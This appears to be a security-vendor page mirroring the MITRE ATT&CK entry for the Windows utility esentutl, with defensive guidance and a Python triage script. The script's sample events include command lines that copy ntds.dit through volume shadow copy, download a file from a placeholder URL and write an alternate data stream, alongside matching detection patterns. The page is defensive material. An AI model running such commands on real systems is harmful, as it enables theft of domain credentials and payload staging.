S0404: esentutl
Analyst context for executives and security teams
esentutl is a legitimate Windows command-line utility for Extensible Storage Engine database maintenance. Its security significance is that ATT&CK links it to behaviors around copying or accessing sensitive local data, including Active Directory NTDS content, direct volume access, file transfer, and hiding data with NTFS attributes. For leaders, this is a “living off the land” concern: the tool may be present by default or approved for administration, so risk decisions depend on whether use is expected, monitored, and explainable on critical Windows systems such as domain controllers.
Executive priority
Prioritize validation on Windows assets where database, identity, and sensitive local data exposure would materially affect business continuity or incident scope. Because this object has no MITRE-provided detection guidance and no ATT&CK tactic assigned directly to the tool, executives should ask whether SOC and IR teams can distinguish routine administrative esentutl activity from suspicious use tied to credential access, local data collection, stealth, or file transfer behaviors. This is especially relevant for identity protection, audit evidence, ransomware/extortion readiness, and incident decision-making involving domain controllers or sensitive file stores.
Technical view
For SOC, detection engineering, and IR teams, treat esentutl as a legitimate Windows binary whose context determines risk. Validate process execution visibility for esentutl, command-line capture, parent/child process lineage, user identity, host role, file paths touched, and resulting file creation or movement. Relationship context ties this tool to T1003.003 NTDS, T1005 Data from Local System, T1006 Direct Volume Access, T1105 Ingress Tool Transfer, T1564.004 NTFS File Attributes, and T1570 Lateral Tool Transfer. Detection should therefore focus on unusual execution on domain controllers, access to NTDS-related paths or database files, unexpected output locations, direct volume-style access patterns where observable, and follow-on movement of generated files across internal systems.
Likely telemetry
- Windows process creation events including executable name, full command line, parent process, user, integrity level, and host
- File access and file creation telemetry for database files, NTDS-related locations, temporary output paths, and unusual archives or copied files
- Domain controller and critical server audit logs, especially where identity databases or sensitive local data are present
- Endpoint detection telemetry for direct volume access indicators and suspicious file-system interactions where supported
- File transfer evidence such as SMB copy activity, internal staging paths, and movement of generated files between Windows systems
Detection direction
- Baseline legitimate administrative esentutl use by server role, user, maintenance window, parent process, and expected command patterns before alerting broadly.
- Prioritize high-severity review when esentutl executes on domain controllers or systems containing sensitive local databases, especially when output files are created outside normal administrative paths.
- Correlate execution with subsequent file movement, staging, or transfer activity because ATT&CK relationships include ingress and lateral tool transfer behaviors.
- Tune for context rather than tool name alone; esentutl can be legitimate, so false positives may come from backup, repair, or database maintenance operations.
- Look for gaps in command-line logging, endpoint file telemetry, and domain controller visibility; without these, defenders may only see the tool after sensitive data has already been copied.
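One way to turn the points above into triage logic, as an added example that is not part of the mirrored ATT&CK page or of Glexia's tooling: it scores constructed esentutl process-creation events against a baseline of (host role, user, parent process), weights the indicators that correspond to the techniques in the relationship table (NTDS paths, VSS-backed copies, remote shares, URL sources, alternate data streams), and correlates the copy destination with a later SMB copy off the host. The host-role tags, the baseline tuples, the weights, the allowlisted output paths and every sample event are assumptions constructed for this example; only the esentutl switches themselves (`/y`, `/vss`, `/d`, `/g`, `/o`) are documented options of the real tool.

```python
"""Triage esentutl executions against the detection direction above.

Added example, not code from the mirrored ATT&CK page or from Glexia. Host roles,
baseline, weights, allowlisted paths and all events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    host_role: str      # assumed asset-inventory tag: "dc", "member" or "workstation"
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class FileCopyEvent:
    host: str
    source_path: str
    destination_path: str   # UNC path when the file leaves the host over SMB


# Constructed baseline of expected administrative use: (role, user, parent image), lowercase.
BASELINE = {("member", "corp\\svc-backup", r"c:\program files\backupagent\agent.exe")}

# Constructed prefixes where administrative output files are expected to land.
ADMIN_OUTPUT_PREFIXES = ("d:\\backups\\", "c:\\windows\\ntds\\")

# Assumed weights; each indicator names the ATT&CK relationship it reflects.
WEIGHTS = {
    "domain_controller": 3,         # execution on a DC is the page's top priority
    "ntds_reference": 4,            # T1003.003 NTDS
    "vss_copy": 2,                  # T1006 Direct Volume Access (the /vss switch)
    "remote_share": 2,              # T1570 Lateral Tool Transfer
    "url_source": 3,                # T1105 Ingress Tool Transfer
    "alternate_data_stream": 3,     # T1564.004 NTFS File Attributes
    "output_outside_admin_paths": 1,
    "follow_on_transfer": 2,        # generated file later copied to another system
}
HIGH_RISK = {"ntds_reference", "alternate_data_stream", "url_source"}

_ADS_RE = re.compile(r"^[a-z]:\\[^:]+:[^:\\]+$")   # e.g. c:\dir\file.txt:stream


def copy_destination(tokens):
    """Destination of a /y copy (the argument after /d); None for other modes.

    /d alone means defragmentation, so it is only a destination in copy mode.
    Note: str.split() is fine for the constructed lines; quoted paths with
    spaces would need shlex.split(cmd, posix=False)."""
    if "/y" in tokens and "/d" in tokens and tokens.index("/d") + 1 < len(tokens):
        return tokens[tokens.index("/d") + 1]
    return None


def indicators(ev: ProcEvent) -> set:
    """Map a single process-creation event to the indicator names above."""
    cmd = ev.command_line.lower()
    tokens = cmd.split()
    found = set()
    if ev.host_role == "dc":
        found.add("domain_controller")
    if "ntds.dit" in cmd:
        found.add("ntds_reference")
    if "/vss" in tokens:
        found.add("vss_copy")
    if any(t.startswith("\\\\") for t in tokens):
        found.add("remote_share")
    if any(t.startswith(("http://", "https://")) for t in tokens):
        found.add("url_source")
    if any(_ADS_RE.match(t) for t in tokens):
        found.add("alternate_data_stream")
    dest = copy_destination(tokens)
    if dest and not dest.startswith(ADMIN_OUTPUT_PREFIXES):
        found.add("output_outside_admin_paths")
    return found


def triage(proc_events, copy_events):
    """One finding per esentutl execution: indicators, score and severity."""
    findings = []
    for ev in proc_events:
        if not ev.image.lower().endswith("\\esentutl.exe"):
            continue
        found = indicators(ev)
        dest = copy_destination(ev.command_line.lower().split())
        # Correlate: the copy destination later leaves the same host over SMB.
        if dest and any(c.host.lower() == ev.host.lower()
                        and c.source_path.lower() == dest
                        and c.destination_path.startswith("\\\\") for c in copy_events):
            found.add("follow_on_transfer")
        score = sum(WEIGHTS[i] for i in found)
        key = (ev.host_role, ev.user.lower(), ev.parent_image.lower())
        if key in BASELINE and not found & HIGH_RISK:
            severity = "info"       # expected maintenance: keep for audit, do not alert
        elif score >= 6:
            severity = "high"
        elif score >= 3:
            severity = "medium"
        else:
            severity = "low"
        findings.append({"host": ev.host, "user": ev.user, "indicators": sorted(found),
                         "score": score, "severity": severity})
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_PROCS = [
    ProcEvent("APP01", "member", "CORP\\svc-backup", r"C:\Program Files\BackupAgent\agent.exe",
              r"C:\Windows\System32\esentutl.exe", r"esentutl.exe /g D:\Databases\app.edb"),
    ProcEvent("DC01", "dc", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\esentutl.exe",
              r"esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Users\Public\export.dit"),
    ProcEvent("WS17", "workstation", "CORP\\asmith", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\esentutl.exe",
              r"esentutl.exe /y https://files.example.invalid/update.bin /d C:\Users\Public\update.bin /o"),
    ProcEvent("APP02", "member", "CORP\\admin2", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\esentutl.exe",
              r"esentutl.exe /y C:\Temp\notes.txt /d C:\Temp\report.txt:config /o"),
]
SAMPLE_COPIES = [FileCopyEvent("DC01", r"C:\Users\Public\export.dit", r"\\FS01\share\export.dit")]

if __name__ == "__main__":
    for f in triage(SAMPLE_PROCS, SAMPLE_COPIES):
        print(f["severity"].upper(), f["host"], f["user"], f["score"], ", ".join(f["indicators"]))
```

The baseline is applied last on purpose: it silences routine maintenance by a known service account and parent, but never an event that references the identity database, a URL source or an alternate data stream, which matches the page's point that tool name alone is not the signal while NTDS access on a domain controller always is.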
Mitigation priorities
- Inventory where esentutl exists and where it is legitimately used, with special attention to domain controllers and critical Windows servers.
- Restrict administrative rights and interactive access on systems containing identity databases or sensitive local data; require documented change or maintenance justification for expected use.
- Ensure process command-line logging, file auditing, and endpoint telemetry are enabled on priority Windows assets before depending on detections.
- Harden domain controller operations and backup handling so copies of NTDS-related data are protected, monitored, and reviewed.
- Review internal file sharing and staging locations for controls that limit unnecessary lateral transfer of sensitive files.
Analyst notes and limits
The main decision value is not that esentutl is malicious; it is a legitimate Microsoft utility that can become material when used in contexts associated with credential access, data collection, stealth, or file movement. ATT&CK relationship context also lists groups that use this object, including menuPass, Chimera, and INC Ransom, but the supplied data should be treated as historical relationship context rather than evidence of current activity in any environment.
MITRE provides no official detection text for this object, no direct tactics for the tool itself, and only Windows as the platform for the software entry. Several related techniques list additional platforms, but platform claims for esentutl should remain Windows-scoped. Local baselines, administrative procedures, endpoint telemetry quality, and domain controller logging are required to determine whether observed use is suspicious.
esentutl
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1006 | Direct Volume Access | esentutl can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`. (Citation: LOLBAS Esentutl)(Citation: Cary Esentutl) |
| Enterprise | T1570 | Lateral Tool Transfer | esentutl can be used to copy files to/from a remote share. (Citation: LOLBAS Esentutl) |
| Enterprise | T1003.003 | NTDS (sub-technique) | esentutl can copy `ntds.dit` using the Volume Shadow Copy service. (Citation: LOLBAS Esentutl)(Citation: Cary Esentutl) |
| Enterprise | T1564.004 | NTFS File Attributes (sub-technique) | esentutl can be used to read and write alternate data streams. (Citation: LOLBAS Esentutl) |
| Enterprise | T1105 | Ingress Tool Transfer | esentutl can be used to copy files from a given URL. (Citation: LOLBAS Esentutl) |
| Enterprise | T1005 | Data from Local System | esentutl can be used to collect data from local file systems. (Citation: Red Canary 2021 Threat Detection Report March 2021) |
Groups, software, and campaigns
G0114: Chimera
G1032: INC Ransom
INC Ransom is a ransomware and data extortion threat group associated with the deployment of INC Ransomware that has been active since at least July 2023. INC Ransom has targeted organizations worldwide, most commonly in the industrial, healthcare, and education sectors in the US and Europe.[1][2][3][4]
G0045: menuPass
menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.[1][2]
menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.[3][4][5][6][7][1][2]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.3 | | Current bundle | 8b4478d54177… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Microsoft Esentutl: Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.
[2] mitre-attack S0404
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.